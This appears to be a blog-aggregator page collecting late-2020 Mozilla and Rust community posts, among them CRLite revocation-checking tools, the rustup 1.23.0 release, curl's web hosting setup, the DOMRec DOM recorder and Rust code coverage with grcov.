J.C. Jones: Auditing the CRLs in CRLite

Since Firefox Nightly is now using CRLite to determine if enrolled websites’ certificates are revoked, it’s useful to dig into the data to answer why a given certificate issuer gets enrolled or not.

Ultimately this is a matter of whether the CRLs for a given issuer are available to CRLite, and are valid, but the Internet is a messy place, and sometimes things don’t work as planned. If an issuing CA is not enrolled in CRLite, the Mozilla infrastructure emits enough information to figure out what went wrong.

Digging into CRLite’s Data Sets

Mozilla’s infrastructure publishes not only the filters and stashes that define the CRLite state-of-the-WebPKI, but also all the intermediate datasets that can be used to both reproduce and validate those filters.

I have a tool, crlite-status, which barely sticks a toe into the water of these datasets.

crlite-status is distributed as a Python package that can be installed via a simple invocation of pip:

pip install crlite-status

It downloads data directly from the Google Cloud Storage buckets for the production and staging environments, and parses out some of the useful statistics. For a simple example, asking for the last four runs out of the default production environment:

Figure: Four recent CRLite runs

It gets more exciting when enabling CRL auditing, as CRLs determine whether an issuer is “enrolled” in CRLite or not:

Figure: crlite-status showing not-enrolled issuers

For just the most recent run, we can see which issuers were excluded from CRLite due to CRL issues, marked with a red X. There are actually six of them.

Even more detail for tracing this information is available with the --crl-details <path> command-line option. I’ve posted one output from 20201126-0 as an example. Using that 20201126-0 data, one can see that all three CertCloud issuers are not enrolled because their CRLs return 403 Forbidden, while the Actalis URL gives a 404 Not Found. TeleSec’s CRL is hosted at a domain that is down entirely. Starfield and Secom both had recoverable warnings, though the Starfield root failed to recover and details would have to be harvested from the crls and logs directory, while the Secom issuer remained enrolled on the basis of the already-cached CRL still being valid.

More to do

Much of the CRLite CRL auditing is still manual. Since the whole state of the generation task gets uploaded to the Google Cloud Filestore, it’s always possible to determine what state existed for CRLite at the time it made its enrollment decisions, but better tools would certainly make that a simpler process.

The Rust Programming Language Blog: Announcing Rustup 1.23.0

The rustup working group is happy to announce the release of rustup version 1.23.0. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of rustup installed, getting rustup 1.23.0 is as easy as closing your IDE and running:

rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

What's new in rustup 1.23.0

Support for Apple M1 devices

Rustup is now natively available for the new Apple M1 devices, allowing you to install it on the new Macs the same way you'd install it on other platforms!

Note that at the time of writing this blog post the aarch64-apple-darwin compiler is a Tier 2 target: precompiled binaries are available starting from Rust 1.49 (currently in the beta channel), but no automated tests are executed on them.

You can follow issue #73908 to track the work needed to bring Apple Silicon support to Tier 1.

Support for installing minor releases

The Rust team releases a new version every six weeks, bringing new features and bugfixes on a regular basis. Sometimes a regression slips into a stable release, and the team releases a "point release" containing fixes for that regression. For example, 1.45.1 and 1.45.2 were point releases of Rust 1.45.0, while 1.46.0 and 1.47.0 both had no point releases.

With rustup 1.22.1 or earlier, if you wanted to use a stable release you could either install stable (which automatically updates to the latest one) or a specific version number, such as 1.48.0, 1.45.0 or 1.45.2. Starting from this release of rustup (1.23.0) you can also install a minor version without specifying the patch version, like 1.48 or 1.45. These “virtual” releases will always point to the latest patch release of that cycle, so rustup toolchain install 1.45 will get you a 1.45.2 toolchain.

New format for rust-toolchain

The rustup 1.5.0 release introduced the rust-toolchain file, allowing you to choose the default toolchain for a project. When the file is present rustup ensures the toolchain specified in it is installed on the local system, and it will use that version when calling rustc or cargo:

$ cat rust-toolchain
nightly-2020-07-10
$ cargo --version
cargo 1.46.0-nightly (fede83ccf 2020-07-02)

The file works great for projects wanting to use a specific nightly version, but it didn’t allow you to add extra components (like clippy) or compilation targets. Rustup 1.23.0 introduces a new, optional TOML syntax for the file, with support for specifying components and targets:

[toolchain]
channel = "nightly-2020-07-10"
components = ["rustfmt", "clippy"]
targets = ["wasm32-unknown-unknown"]

The new syntax doesn't replace the old one, and both will continue to work. You can learn more about overriding the default toolchain in the "Overrides" chapter of the rustup book.

Other changes

There are more changes in rustup 1.23.0: check them out in the changelog! Rustup's documentation is also available in the rustup book starting from this release.

Thanks

Thanks to all the contributors who made rustup 1.23.0 possible!

  • Aaron Loucks
  • Aleksey Kladov
  • Aurelia Dolo
  • Camelid
  • Chansuke
  • Carol (Nichols || Goulding)
  • Daniel Silverstone
  • Dany Marcoux
  • Eduard Miller
  • Eduardo Broto
  • Eric Huss
  • Francesco Zardi
  • FR Bimo
  • Ivan Nejgebauer
  • Ivan Tham
  • Jake Goulding
  • Jens Reidel
  • Joshua M. Clulow
  • Joshua Nelson
  • Jubilee Young
  • Leigh McCulloch
  • Lzu Tao
  • Matthias Krüger
  • Matt Kraai
  • Matt McKay
  • Nick Ashley
  • Pascal Hertleif
  • Paul Lange
  • Pietro Albini
  • Robert Collins
  • Stephen Muss
  • Tom Eccles

Cameron Kaiser: TenFourFox FPR30b1 available

TenFourFox Feature Parity Release 30 beta 1 is now available (downloads, hashes, release notes). I managed to make some good progress on backporting later improvements to the network and URL handling code, so there are no UI-facing features in this release, but the browser should use a bit less memory and run a little quicker especially on pages that reference a lot of resources (which, admittedly, is a lot of sites these days). There is also a minor update to the host database for basic adblock. Assuming all goes well, this release will come out parallel with Firefox 84 on or around December 15. I'll probably do an SPR-only build for the release immediately following to give myself a break; this will contain just needed security fixes, and there will most likely not be a beta.

A few people got bitten by not noticing the locale update, so let me remind everyone that FPR29 needs new locales if you are using a custom langpack. They're linked from the main TenFourFox page and all of them are on SourceForge except for the separately-maintained Japanese version, which I noticed has also been updated to FPR29. If you get a weird error starting TenFourFox and you have a langpack installed, quit the browser and run the new langpack installer and it should fix itself.

Finally, in case you missed it, with the right browser and a side-car TLS 1.2 proxy, you can get A/UX, Power MachTen (on any classic MacOS supporting it) and pre-Tiger Mac OS X able to access modern web pages again. The key advance here is that the same machine can also run the proxy all by itself: no cheating with a second system! Sadly, this does not work as-is with all browsers, including with Classilla, which is something I'll think about allowing as a down payment on proper in-browser support at some future date.

J.C. Jones: Querying CRLite for WebPKI Revocations

Firefox Nightly is now using CRLite to determine if websites’ certificates are revoked — e.g., if the Certificate Authority published that web browsers shouldn’t trust that website certificate. Telemetry shows that querying the local CRLite dataset is much faster than making a network connection for OCSP, which makes intuitive sense. It also avoids sending the website’s certificate information in cleartext over the network to check the revocation status: solving one of the remaining cleartext browsing data leakages in Firefox.

Mozilla is currently publishing CRLite data to Remote Settings four times per day, keeping a very fresh set of revocation information for the public Web. I’ve provided some direct details on how to get at that data from the CRLite FAQ, and I want to introduce one of my command-line tools I’ve used to analyze and play with the dataset: moz_crlite_query. I’ll introduce crlite_status in a later post.

Querying CRLite Status at the CLI

moz_crlite_query is a Python tool that more-or-less implements the same algorithm Firefox does to check a website’s certificate against CRLite. It maintains a local database of the CRLite dataset in your ~/.crlite_db/ directory, which for me right now looks like:

      0 Nov 25 09:24 .last_updated
5381898 Nov 25 09:24 2020-11-24T00:08:12+00:00Z-full
  27363 Nov 25 09:24 2020-11-24T06:08:12+00:00Z-diff
  59196 Nov 25 09:24 2020-11-24T12:08:14+00:00Z-diff
  56121 Nov 25 09:24 2020-11-24T18:08:15+00:00Z-diff
 204863 Nov 25 09:24 2020-11-25T00:08:23+00:00Z-diff
  25826 Nov 25 09:24 2020-11-25T06:08:05+00:00Z-diff
  66626 Nov 25 09:24 2020-11-25T12:08:22+00:00Z-diff
  53783 Nov 25 22:19 2020-11-25T18:08:11+00:00Z-diff
 190353 Nov 25 22:19 2020-11-26T00:08:11+00:00Z-diff
1118208 Nov 25 22:19 intermediates.sqlite

You can see here that the last full CRLite filter update happened at the midnight-UTC update on 24 November 2020, and since then there have been eight delta updates (e.g., “stashes”).

moz_crlite_query is distributed as a Python package that can be installed via an invocation of pip (note that this tool requires Python 3.7 or newer because of SQLite features):

pip install moz_crlite_query

On invocation, the tool will try to update to the latest CRLite data, unless it already updated in the last several hours.

You can query the CRLite status for either a certificate you already have, or the tool can connect to one or more websites and examine the certificates presented there.

Experimenting with the Query Tool

Let’s download a few certificates into /tmp from crt.sh: 77575263, 1988442812, 1485147627, and 2680822568. These are simply representative – right now – of various states in the Web PKI.

○ → for id in 77575263 1988442812 1485147627 2680822568; do
>   curl --silent https://crt.sh/?d=${id} > /tmp/${id}.pem
> done

Now, run them all through CRLite:

○ → moz_crlite_query /tmp/*.pem
INFO:crlite_query:CRLite Update: Syncing CRLite filters.
100% (9 of 9) |######################################################| Elapsed Time: 0:00:00 Time:  0:00:00
INFO:query_cli:Status: 2457 Intermediates, Current filter: 2020-11-24T00:08:12+00:00Z-full
with 27 layers and 43053008 bit-count, 8 stash files with 43022 stashed revocations,
up-to-date as of 2020-11-26 00:08:11+00:00 (5:11:15.467645 ago).
/tmp/1485147627.pem      Issuer: CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US
                         Enrolled in CRLite: ❌
                         Result: ❔ Not Enrolled ❔
/tmp/1988442812.pem      Issuer: CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US
                         Enrolled in CRLite: ✅
                         Revoked via CRLite filter: 2020-11-24T00:08:12+00:00Z-full
                         Result: ⛔️ Revoked ⛔️
/tmp/2680822568.pem      Issuer: CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US
                         Enrolled in CRLite: ✅
                         Result: 👍 Valid 👍
/tmp/77575263.pem      Issuer: CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US
                       Enrolled in CRLite: ✅
                       Result: ⏰ Expired ⏰

We can see 1485147627 is issued by a CA not participating in CRLite: Let’s Encrypt doesn’t publish CRLs. 1988442812 is for revoked.badssl.com, and is revoked. 2680822568 is currently a certificate used for many Mozilla properties, like firefox.com and taskcluster.net. Finally, 77575263 is an expired certificate for blog.mozilla.com (and some others).

We can also supply hosts, either on the command line, as an input file, or both:

○ → cat >/tmp/top4.txt <<EOF
apple.com
youtube.com
www.google.com:443
# This is definitely half of my top 8 spaces
www.blogger.com
EOF

○ → moz_crlite_query --hosts mozilla.com firefox.com --hosts getfirefox.net --hosts-file /tmp/top4.txt
INFO:query_cli:Database was updated at 2020-11-25 22:19:26.467085, skipping.
INFO:query_cli:Status: 2457 Intermediates, Current filter: 2020-11-24T00:08:12+00:00Z-full
with 27 layers and 43053008 bit-count, 8 stash files with 43022 stashed revocations,
up-to-date as of 2020-11-26 00:08:11+00:00 (5:21:25.126138 ago).
mozilla.com:443      Issuer: CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US
                     Enrolled in CRLite: ❌
                     Result: ❔ Not Enrolled ❔
firefox.com:443      Issuer: CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US
                     Enrolled in CRLite: ❌
                     Result: ❔ Not Enrolled ❔
getfirefox.net:443      Issuer: CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US
                        Enrolled in CRLite: ❌
                        Result: ❔ Not Enrolled ❔
apple.com:443      Issuer: CN=DigiCert SHA2 Extended Validation Server CA-3,OU=www.digicert.com,O=DigiCert\, Inc.,C=US
                   Enrolled in CRLite: ✅
                   Result: 👍 Valid 👍
youtube.com:443      Issuer: CN=GTS CA 1O1,O=Google Trust Services,C=US
                     Enrolled in CRLite: ✅
                     Result: 👍 Valid 👍
www.google.com:443      Issuer: CN=GTS CA 1O1,O=Google Trust Services,C=US
                        Enrolled in CRLite: ✅
                        Result: 👍 Valid 👍
www.blogger.com:443      Issuer: CN=GTS CA 1O1,O=Google Trust Services,C=US
                         Enrolled in CRLite: ✅
                         Result: 👍 Valid 👍

This is all in good fun, but there’s more possibility here than just a command-line gimmick.

Embedding CRLite into Other Tools?

Many tools use the Mozilla Root CA program’s list of trust anchors for their trust decisions, particularly on Linux or BSD operating systems. For many such tools, certificate revocations are sufficiently unlikely and the consequences sufficiently low that checking revocation status is simply unimportant. For those tools that do check, leaking the status check in cleartext to network observers is likely to simply be evidence of doing a software update. However, I can imagine that some tools might benefit from CRLite’s infrastructure-as-a-service, and make good use of the privacy benefit.

As it’s not particularly difficult to develop a CRLite client, perhaps if this tooling makes it to Firefox Release, we’ll see some libraries for non-Firefox users of CRLite.

While Mozilla certainly isn’t intending to have numerous users of the data beyond Firefox — at least they aren’t accounted for in the budget — the data is there, and there to be useful.

The Talospace Project: Firefox 83 on POWER

LTO-PGO is still working great in Firefox 83, which expands in-browser PDF support, adds additional features to Picture-in-Picture (which is still one of my favourite tools in Firefox) and makes some miscellaneous developer-facing changes. The exact same process, configs and patches that were used for Firefox 82 work to build a fully link-time and profile-guided optimized build.

Dan Horák has filed three bugs (1679271, 1679272 and 1679273) for build failures related to the internal profiler, which is still not supported on ppc64, ppc64le or s390x (or, for that matter, 32-bit PowerPC). These targeted fixes should be landing well before release, but perhaps we should be thinking about how to get it working on OpenPOWER rather than having to play emergency games of whack-a-mole whenever the build blows up.

This Week In Rust: This Week in Rust 366

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Tooling
Observations/Thoughts
Rust Walkthroughs
Project Updates
Miscellaneous

Crate of the Week

This week's crate is cargo-intraconv, a cargo subcommand to convert links in rust documentation to the newly stable intra-doc-links format.

Thanks to Alexis Bourget for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

345 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-11-24: 1 Regression, 2 Improvements, 2 mixed

This week saw landing of #79237 which by itself provides no wins but opens the door to support for split debuginfo on macOS. This'll eventually show huge wins as we can likely avoid re-collecting debuginfo while retaining support for lldb and Rust backtraces. #79361 tracks the stabilization of the rustc flag, but the precise rollout to stable users is not yet 100% clear.

Triage done by @jyn514 and @simulacrum.

4 regressions, 4 improvements, 2 mixed results. 5 of them in rollups.

See the full report for more.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs

No Tracking Issues or PRs are currently in the final comment period.

New RFCs

Upcoming Events

Online
North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

I know nothing about the compiler internals but it looks to me as if 90% of the time is spent pretty-printing LayoutError.

Vadzim Dambrouski on github

Thanks to mmmmib for the suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Allen Wirfs-Brock: Software Diagrams Aren’t Always Correct and That’s OK

This morning I saw an interesting twitter thread:

Tudor is the driving force behind gtoolkit.com, a modern and innovative programming environment that builds upon and extends classic Smalltalk development concepts. Tudor is someone worth listening to, but his tweet was something that I really couldn’t agree with. I found myself more in agreement with Andrei Pacurariu’s reply.

I started to tweet a response but quickly found that my thoughts were too complex to make a good tweet stream. Instead, I wrote the following mini essay.


Concretely, software is just bits in electronic storage that control and/or are manipulated by processors. Abstractions are the building blocks that enable humans to design and build complex software systems out of bits. Abstractions are products of our minds—they allow us to assign meaning to clusters (some large, some small) of bits. They allow us to build software systems without thinking about billions of bits or how processors work.

We manifest some useful and generally simple abstractions (instructions, statements, functions, classes, modules, etc.) as “code” using other abstractions we call “languages.”  Languages give us a common vocabulary for us to communicate about those abstract building blocks and to produce the corresponding bits.  There are many useful tools that can and should be created to help us understand the code-level operation of a system.

But most systems we build today are too complex to be fully understood at the level of code. In designing them we must use higher-level abstractions to conceptualize, compose, and organize code. Abstract machines, frameworks, patterns, roles, stereotypes, heuristics, constraints, etc. are examples of such higher-level abstractions.

The languages we commonly use provide few, if any, mechanisms for directly identifying such higher-level abstractions.  These abstractions may manifest as naming or other coding conventions but recognizing them as such depends upon a pre-existing shared understanding between the writer and readers of the code.

If such conventions have been adequately formalized and followed, a tool may be able to assist a human identify and display the usage of higher-level abstractions within a code base. But traditionally, such tools are rare and often unreliable.  One problem is that abstractions can overlap. So we (or the tools) not only need to identify and classify abstractions but also identify the clustering and organization of abstractions. Sometimes this results in multiple views that can provide totally different conceptions of the operation of the code we are looking at.

Software designers/architects often use informal diagrams to capture their conceptualization of the structure and interactions of the higher-level abstractions of their designs. Such diagrams can serve as maps that help developers understand the territory of the code. 

But developers are often skeptical of such diagrams. Experience (and folklore) has taught them that design diagrams likely do not accurately reflect the actual state of a code base.  So, how do we familiarize ourselves with a new software code base that we wish to modify or extend? Most commonly we just try to reverse engineer its architecture/design by examining the code. We tell ourselves that the code provides the ground truth and that we or our tools can generate truthful design docs from the code because the code doesn’t lie. When humans read code we can easily miss or misinterpret the higher-level abstractions that are lurking among and above the code. It’s a real challenge to imagine a tool that can do better.

Lacking design documents or even a good sense of a system’s overall design we then often make local code changes without correctly understanding the design context within which that code operates. Such local changes may “work” to solve some immediate problem. But as they accumulate over long periods such changes erode the design integrity of the overall system. And they contribute to the invalidation of any pre-existing design documents and diagrams that may have at one point in time provided an accurate map of the system. 

We definitely need better tools for integrating higher-level system architecture/design abstraction with code—or at least for integrating documentation. But don’t tell me that creating such documents is a waste of time or that any such documents should be ignored. I’ve spent too many decades trying to guess how a complex program was intended to work by trying to use the code to get into the mind of the original designers and developers. Any design documentation is useful documentation. It will probably need to be verified against the current state of the code, but even when the documents are no longer the truth they often provide insights that help our understanding of the system. When I asked Rebecca Wirfs-Brock to review this little essay, she had an experience to relate:

I remember doing a code/architecture review for a company that built software to perform high reliability backups…and I was happy that the architectural documents were say 70% accurate as they gave me a good look into the mind of the architect who engineered these frameworks. And I didn’t think it worthwhile to update it to reflect truth. As it was a snapshot in time. Sometimes updating may be worthwhile, but as in archeological digs, you’ve gotta be careful about this.

Diagrams and other design documents probably won’t be up to date when somebody reads them in the future. But that’s not an excuse to not create them. If you care about the design integrity of your software system you need to provide future developers (including yourself) a map of your abstract design as you currently know it.

Daniel Stenberg: The curl web infrastructure

The purpose of the curl web site is to inform the world about what curl and libcurl are and provide as much information as possible about the project, the products and everything related to that.

The web site has existed in some form for as long as the project has, but it has of course developed and changed over time.

Independent

The curl project is completely independent and stands free from influence from any parent or umbrella organization or company. It is not even a legal entity, just a bunch of random people cooperating over the Internet. And a bunch of awesome sponsors to help us.

This means that we have no one that provides the infrastructure or marketing for us. We need to provide, run and care for our own servers and anything else we think we should offer our users.

I still do a lot of the work in curl and the curl web site and I work full time on curl, for wolfSSL. This might of course “taint” my opinions and views on matters, but doesn’t imply ownership or control. I’m sure we’re all colored by where we work and where we are in our lives right now.

Contents

Most of the web site is static content: generated HTML pages. They are served super-fast and very lightweight by any web server software.

The web site source exists in the curl-www repository (hosted on GitHub) and the web site syncs itself with the latest repository changes several times per hour. The parts of the site that aren’t static mostly consist of smaller scripts that run either on demand at the time of a request or at an interval in a cronjob in the background. That is part of the reason why pushing an update to the web site’s repository can take a little while until it shows up on the live site.

There’s a deliberate effort at not duplicating information so a lot of the web pages you can find on the web site are files that are converted and “HTMLified” from the source code git repository.

“Design”

Some people say the curl web site is “retro”, others that it is plain ugly. My main focus with the site is to provide and offer all the info, and have it be accurate and accessible. The look and the design of the web site is a constant battle, as nobody who’s involved in editing or polishing the web site is really interested in or particularly good at design, looks or UX. I personally have done most of the editing of it, including CSS etc and I can tell you that I’m not good at it and I don’t enjoy it. I do it because I feel I have to.

I get occasional offers to “redesign” the web site, but the general problem is that those offers almost always involve rebuilding the entire thing using some current web framework, not just fixing the looks, layout or hierarchy. By replacing everything like that we’d get a lot of problems to get the existing information in there – and again, the information is more important than the looks.

The curl logo is designed by a proper designer however (Adrian Burcea).

If you want to help out designing and improving the web site, you’d be most welcome!

Who

I’ve already touched on it: the web site is mostly available in git so “anyone” can submit issues and pull-requests to improve it, and we are around twenty persons who have push rights that can then make a change on the live site. In reality of course we are not that many who work on the site any ordinary month, or even year. During the last twelve month period, 10 persons authored commits in the web repository and I did 90% of those.

How

Technically, we build the site with traditional makefiles and we generate the web contents mostly by preprocessing files using a C-like preprocessor called fcpp. This is an old and rather crude setup that we’ve used for over twenty years but it’s functional and it allows us to have a mostly static web site that is also fairly easy to build locally so that we can work out and check improvements before we push them to the git repository and then out to the world.

The web site is of course only available over HTTPS.

Hosting

The curl web site is hosted on an origin VPS server in Sweden. The machine is maintained primarily by me and is paid for by Haxx. The exact hosting is not terribly important because users don’t really interact with our server directly… (Also, as they’re not sponsors, we’re just ordinary customers, so I won’t mention their name here.)

CDN

A few years ago we experienced repeated server outages simply because our own infrastructure did not handle the load very well, and in particular not the traffic spikes that could occur when I would post a blog post that would suddenly reach a wide audience.

Enter Fastly. Now, when you go to curl.se (or daniel.haxx.se) you don’t actually reach the origin server we admin, you will instead reach one of Fastly’s servers that are distributed across the world. They then fetch the web contents from our origin, cache it on their edge servers and send it to you when you browse the site. This way, your client speaks to a server that is likely (much) closer to you than the origin server is and you’ll get the content faster and experience a “snappier” web site. And our server only gets a tiny fraction of the load.

Technically, this is achieved by the name curl.se resolving to a number of IP addresses that are anycasted. Right now, that’s 4 IPv4 addresses and 4 IPv6 addresses.

The fact that the CDN servers cache content “a while” is another explanation to why updated contents take a little while to “take effect” for all visitors.

DNS

When we just recently switched the site over to curl.se, we also adjusted how we handle DNS.

I run our own main DNS server where I control and admin the zone and the contents of it. We then have four secondary servers to help us really up our reliability. Out of those four secondaries, three are sponsored by Kirei and are anycasted. They should be both fast and reliable for most of the world.

With the help of fabulous friends like Fastly and Kirei, we hope that the curl web site and services shall remain stable and available.

DNS enthusiasts have remarked that we don’t do DNSSEC or registry-lock on the curl.se domain. I think we have reason to consider and possibly remedy that going forward.

Traffic

The curl web site is just the home of our little open source project. Most users out there in the world who run and use curl or libcurl will not download it from us. Most curl users get their software installation from their Linux distribution or operating system provider. The git repository and all issues and pull-requests are done on GitHub.

Relevant here is that we have no logging and we run no ads or any analytics. We do this for maximum user privacy and partly because of laziness, since handling logging from the CDN system is work. Therefore, I only have aggregated statistics.

In this autumn of 2020, over a normal 30 day period, the web site serves almost 11 TB of data to 360 million HTTP requests. The traffic volume is up from 3.5 TB the same time last year. 11 terabytes per 30 days equals about 4 megabytes per second on average.

Without logs we cannot know what people are downloading – but we can guess! We know that the CA cert bundle is popular and we also know that in today’s world of containers and CI systems, a lot of things out there will download the same packages repeatedly. Otherwise the web site mostly consists of text and very small images.

One interesting specific pattern on the server load that’s been going on for months: every morning at 05:30 UTC, the site gets over 50,000 requests within that single minute, during which 10 gigabytes of data is downloaded. The clients are distributed world wide as I see the same pattern on access points all over. The minute before and the minute after, the average traffic rate remains at 200MB/minute. It makes for a fun graph:

Figure: An eight hour zoomed in window of bytes transferred from the web site. UTC times.

Our servers suffer somewhat from being the target of weird clients like qqgamehall that continuously “hammer” the site with requests at a high frequency many months after we started always returning an error to them. An effect they have is that they make the admin dashboard constantly show a very high error rate.

Software

The origin server runs Debian Linux and Apache httpd. It has a reverse proxy based on nginx. The DNS server is bind. The entire web site is built with free and open source. Primarily: fcpp, make, roffit, perl, curl, hypermail and enscript.

If you curl the curl site, you can see in response headers that Fastly uses Varnish.

Robert O'Callahan: DOM Recording For Web Application Demos

To show off the power of our Pernosco debugger, we wanted many short demo videos of the application interface. Regular videos are relatively heavyweight and lossy; we wanted something more like Asciinema, but for our Web application, not just a terminal. So we created DOMRec, a DOM recorder.

The approach is surprisingly straightforward. To record a demo, we inject the DOMRec script into our application. DOMRec captures the current DOM state and uses a DOM Mutation Observer to record all DOM state changes with associated timestamps. To replay the demo, we create an iframe, fill it with the recorded initial DOM state, then replay the DOM state changes over time. Replay inserts links to the original stylesheets but doesn't load or execute the original scripts. (Of course it couldn't be quite that simple ... see below.)
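
To make the recording half concrete, here is a minimal sketch of that idea using the standard MutationObserver API. This is not DOMRec's actual code, just the shape of the approach; a real recorder would serialize nodes to stable IDs instead of keeping live references:

// Illustrative sketch: record the initial DOM, then log every mutation with a timestamp.
const recording = {
  initialHTML: document.documentElement.outerHTML,  // starting DOM state
  startTime: performance.now(),
  mutations: [],                                    // timestamped change log
};

const observer = new MutationObserver((records) => {
  const time = performance.now() - recording.startTime;
  for (const record of records) {
    recording.mutations.push({
      time,
      type: record.type,              // "childList", "attributes" or "characterData"
      target: record.target,          // a real recorder would store a node ID here
      attributeName: record.attributeName,
      oldValue: record.oldValue,
      addedNodes: [...record.addedNodes],
      removedNodes: [...record.removedNodes],
    });
  }
});

observer.observe(document.documentElement, {
  subtree: true,
  childList: true,
  attributes: true,
  attributeOldValue: true,
  characterData: true,
  characterDataOldValue: true,
});

Replay then amounts to walking recording.mutations in time order and applying each change to the iframe's copy of the document.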

The resulting demos are compact (most of ours are less than 100KB gzipped), work on almost any browser/device, and are pixel-perfect at any zoom level. DOMRec supports single-frame screenshots when dynamism is not required. We can't use browser HTML5 video controls but we implement play/pause/fullscreen buttons.

Capturing DOM state isn't quite enough because some rendering-relevant state isn't in the DOM. DOMRec logs mouse movement and click events and, during replay, displays a fake mouse cursor and click effect. DOMRec tracks focus changes, and during replay sets "fake focus" classes on relevant DOM elements; our application style sheets check those classes in addition to the real :focus and :focus-within pseudoclasses. When necessary DOMRec creates a fake caret. DOMRec captures scroll offsets and makes a best-effort attempt to match scroll positions during recording and replay. Canvas drawing operations don't change the DOM and don't trigger events, so our application manually triggers a "didDrawCanvas" DOM event which DOMRec listens for. Sometimes the Pernosco client needs to trigger a style flush to get CSS transitions to work properly, which also needs to happen during replay, so we fire a special notification event for that too. It's a bit ad-hoc — we implemented just enough for our needs, and no more — but it does at least handle Microsoft's Monaco editor correctly, which is pretty complicated.
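
As an illustration of that last integration point, dispatching and listening for such a notification only needs the standard CustomEvent API. The "didDrawCanvas" name comes from the paragraph above; everything else in this sketch (the drawing helper and the snapshot handling) is hypothetical, not DOMRec's implementation:

// Application side: after drawing to a canvas, announce it (hypothetical helper).
function drawAndNotify(canvas) {
  const ctx = canvas.getContext("2d");
  ctx.fillRect(0, 0, 10, 10);  // some drawing work
  canvas.dispatchEvent(new CustomEvent("didDrawCanvas", { bubbles: true }));
}

// Recorder side: capture the canvas pixels when notified (hypothetical handling).
document.addEventListener("didDrawCanvas", (event) => {
  const snapshot = event.target.toDataURL();  // data: URL of the canvas contents
  // ...store the snapshot alongside the mutation log with a timestamp...
});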

DOMRec can record demos executed manually, but in practice our demos are scripted using Selenium so that we can rebuild the demo movie when our application interface has changed.

This kind of thing has certainly been built many times — see Inspectlet and its competitors — so when I first looked into this problem a few years ago I assumed I would find an open-source off-the-shelf solution. Unfortunately I couldn't find one that looked easy to consume. Now we're releasing DOMRec with an MIT license. To tell the truth, we're not trying hard to make DOMRec easy to consume, either; as noted above, some applications need to be tweaked to work with it, and this blog post is about all you're going to get in terms of documentation. Still, it's only 1200 lines of standalone Javascript so people may find it easier than starting from scratch.

Marco Castelluccio: How to collect Rust source-based code coverage

TL;DR: For those of you who prefer an example to words, you can find a complete and simple one at https://github.com/marco-c/rust-code-coverage-sample.

Source-based code coverage was recently introduced in Rust. It is more precise than the gcov-based coverage, with fewer workarounds needed. Its only drawback is that it makes the profiled program slower than with gcov-based coverage.

In this post, I will show you a simple example on how to set up source-based coverage on a Rust project, and how to generate a report using grcov (in a readable format or in a JSON format which can be parsed to generate custom reports or upload results to Coveralls/Codecov).

Install requirements

First of all, let’s install grcov:

cargo install grcov

Second, let’s install the llvm-tools Rust component (which grcov will use to parse coverage artifacts):

rustup component add llvm-tools-preview

At the time of writing, the component is called llvm-tools-preview. It might be renamed to llvm-tools soon.

Build

Let’s say we have a simple project, where our main.rs is:

use std::fmt::Debug;

#[derive(Debug)]
pub struct Ciao {
    pub saluto: String,
}

fn main() {
    let ciao = Ciao{ saluto: String::from("salve") };

    assert!(ciao.saluto == "salve");
}

In order to make Rust generate an instrumented binary, we need to use the -Zinstrument-coverage flag (Nightly only for now!):

export RUSTFLAGS="-Zinstrument-coverage"

Now, build with cargo build.

The compiled instrumented binary will appear under target/debug/:

.
├── Cargo.lock
├── Cargo.toml
├── src
│   └── main.rs
└── target
    └── debug
        └── rust-code-coverage-sample

The instrumented binary contains information about the structure of the source file (functions, branches, basic blocks, and so on).

Run

Now, the instrumented executable can be executed (cargo run, cargo test, or whatever). A new file with the extension ‘profraw’ will be generated. It contains the coverage counters associated with your binary file (how many times a line was executed, how many times a branch was taken, and so on). You can define your own name for the output file (might be necessary in some complex test scenarios like we have on grcov) using the LLVM_PROFILE_FILE environment variable.

LLVM_PROFILE_FILE="your_name-%p-%m.profraw"

%p (process ID) and %m (binary signature) are useful to make sure each process and each binary has its own file.

Your tree will now look like this:

.
├── Cargo.lock
├── Cargo.toml
├── default.profraw
├── src
│   └── main.rs
└── target
    └── debug
        └── rust-code-coverage-sample

At this point, we just need a way to parse the profraw file and the associated information from the binary.

Parse with grcov

grcov can be downloaded from GitHub (from the Releases page).

Simply execute grcov in the root of your repository, with the --binary-path option pointing to the directory containing your binaries (e.g. ./target/debug). The -t option allows you to specify the output format:

  • “html” for a HTML report;
  • “lcov” for the LCOV format, which you can then translate to a HTML report using genhtml;
  • “coveralls” for a JSON format compatible with Coveralls/Codecov;
  • “coveralls+” for an extension of the former, with addition of function information. There are other formats too.

Example:

grcov . --binary-path PATH_TO_YOUR_BINARIES_DIRECTORY -s . -t html --branch --ignore-not-existing -o ./coverage/

This is the output:

[Embedded HTML report showing source-based coverage]

This would be the output with gcov-based coverage:

[Embedded HTML report showing gcov-based coverage]

